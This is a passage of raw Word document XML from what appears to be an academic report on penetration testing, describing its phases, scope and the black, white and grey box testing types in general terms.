          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A0B4D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00563B7A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>This phase has two main methods: passive reconnaissance and active reconnaissance. Passive reconnaissance involves collecting as much information as possible about the target without directly interacting with it, using publicly available information on the internet. This information may include usernames, email addresses, phone numbers, and IP addresses. Active reconnaissance (scanning) involves directly interacting with the target to gather information such as the operating system, open ports, and running services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8E48B3" w14:textId="2BA788EE" w:rsidR="004A0B4D" w:rsidRPr="00D77DFE" w:rsidRDefault="00E225AF" w:rsidP="00E225AF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">b) </w:t>
      </w:r>
      <w:r w:rsidR="00563B7A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability Assessment</w:t>
      </w:r>
      <w:r w:rsidR="004A0B4D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00563B7A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496ED3B1" w14:textId="6D8B18C8" w:rsidR="00563B7A" w:rsidRPr="00D77DFE" w:rsidRDefault="00563B7A" w:rsidP="002F4B94">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>This phase is where the tester uses the information that has been previously collected to identify vulnerabilities in the systems. For example, identifying an unpatched plugin in a web application that could lead to an SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505A9542" w14:textId="5CE8B071" w:rsidR="0084613B" w:rsidRPr="00D77DFE" w:rsidRDefault="002D58A1" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c)</w:t>
      </w:r>
      <w:r w:rsidR="009416E5" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00563B7A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:r w:rsidR="0084613B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00563B7A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2FBD97" w14:textId="11FDCAD2" w:rsidR="00563B7A" w:rsidRPr="00D77DFE" w:rsidRDefault="00563B7A" w:rsidP="002F4B94">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>This phase is based on the previous one, where the tester attempts to exploit the identified vulnerabilities (such as the unpatched plugin in the previous example) to gain initial access to the system by taking advantage of existing weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA2C733" w14:textId="4CE8BD17" w:rsidR="002017DC" w:rsidRPr="00D77DFE" w:rsidRDefault="002D58A1" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">d) </w:t>
      </w:r>
      <w:r w:rsidR="00563B7A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Post-Exploitation</w:t>
      </w:r>
      <w:r w:rsidR="002017DC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00563B7A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041C939E" w14:textId="0C4296F0" w:rsidR="00563B7A" w:rsidRPr="00D77DFE" w:rsidRDefault="00563B7A" w:rsidP="009416E5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">After gaining initial access, the tester can look for additional vulnerabilities within the system, such as pivoting, privilege escalation, or ethically simulating malicious activities like data theft, ransomware </w:t>
      </w:r>
      <w:r w:rsidR="007B6EB7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>behaviour</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>, or malware deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DD4031" w14:textId="2D59D3F0" w:rsidR="00871793" w:rsidRPr="00D77DFE" w:rsidRDefault="002D58A1" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e)</w:t>
      </w:r>
      <w:r w:rsidR="009416E5" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00563B7A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reporting</w:t>
      </w:r>
      <w:r w:rsidR="00871793" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00563B7A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B468EA9" w14:textId="13F248BD" w:rsidR="00043A15" w:rsidRPr="00D77DFE" w:rsidRDefault="00563B7A" w:rsidP="009416E5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>At the end of the penetration test, the tester must create documentation for different audiences (developers, testers, non-technical clients, etc.), depending on the purpose of the report. The goal is to identify all weaknesses found during the penetration test and provide recommended fixes to improve the system’s security design.</w:t>
      </w:r>
      <w:r w:rsidR="004B0474" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D47E2CE" w14:textId="11AA9058" w:rsidR="00712E47" w:rsidRPr="00D77DFE" w:rsidRDefault="00A87EBA" w:rsidP="00BE1C17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc223521094"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="009E776C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scope of Penetration Testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB359F0" w14:textId="177EE5BE" w:rsidR="00563B7A" w:rsidRPr="00D77DFE" w:rsidRDefault="00563B7A" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>The scope identifies all included components (IP addresses, devices, web applications, etc.) and excluded components (such as critical systems, third-party services, and risky penetration attacks like DDoS</w:t>
      </w:r>
      <w:r w:rsidR="004700D3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="004700D3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Distributed Denial of Service Attack)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>). It should also define the testing objectives, specify which techniques are allowed or prohibited during testing, and indicate the type of penetration testing to be performed.</w:t>
      </w:r>
      <w:r w:rsidR="005651D6" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="38" w:name="paragraph14"/>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource14"</w:instrText>
      </w:r>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005651D6" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[14]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1636BC02" w14:textId="79BE2523" w:rsidR="00145AE4" w:rsidRPr="00D77DFE" w:rsidRDefault="002065C7" w:rsidP="00BE1C17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc223521095"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="009E776C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r w:rsidR="00145AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Penetration Testing Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidR="00145AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CD19C4" w14:textId="67BF974F" w:rsidR="00BF3520" w:rsidRPr="00D77DFE" w:rsidRDefault="00BF3520" w:rsidP="00E225AF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Penetration testing can be categorized based on the type and amount of information provided to the tester by the organization, which directly influences the testing approach and methodology.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE" w:rsidDel="00BF3520">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A01E11" w14:textId="2F5870D7" w:rsidR="004A6140" w:rsidRPr="00D77DFE" w:rsidRDefault="009E44FE" w:rsidP="00E225AF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>In b</w:t>
      </w:r>
      <w:r w:rsidR="00CC776D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>lack Box Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> n</w:t>
      </w:r>
      <w:r w:rsidR="00CC776D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>o information is provided by the client or organization about their internal components. Only the scope is defined, and the tester must figure out the rest independently. This type of testing is the most realistic, as it simulates an attacker with no prior knowledge, but it is also the most challenging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3073A079" w14:textId="2EAF9B32" w:rsidR="004A6140" w:rsidRPr="00D77DFE" w:rsidRDefault="00CC776D" w:rsidP="00E225AF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>White Box Testing</w:t>
      </w:r>
      <w:r w:rsidR="00043428" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00043428" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>ased on full knowledge of internal systems provided by the client or organization to the testers, with the goal of deep testing and analysis, such as reviewing the source code of a web application. This type of testing gives the tester complete visibility into the internal logic and flow of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050A86E2" w14:textId="6732B5A8" w:rsidR="00942CE1" w:rsidRPr="00D77DFE" w:rsidRDefault="004A6140" w:rsidP="00E225AF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Grey Box Testing</w:t>
      </w:r>
      <w:r w:rsidR="001C551C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="001C551C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C551C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>ased on partial information provided by the client or organization, such as credentials or network diagrams. This type of testing combines aspects of both black box and white box testing and focuses more on post-exploitation activities</w:t>
      </w:r>
      <w:r w:rsidR="00563B7A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>what an attacker could do after gaining initial access to the system.</w:t>
      </w:r>
      <w:r w:rsidR="00556DBD" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="40" w:name="paragraph15"/>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource15"</w:instrText>
      </w:r>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00556DBD" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[15]</w:t>
      </w:r>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
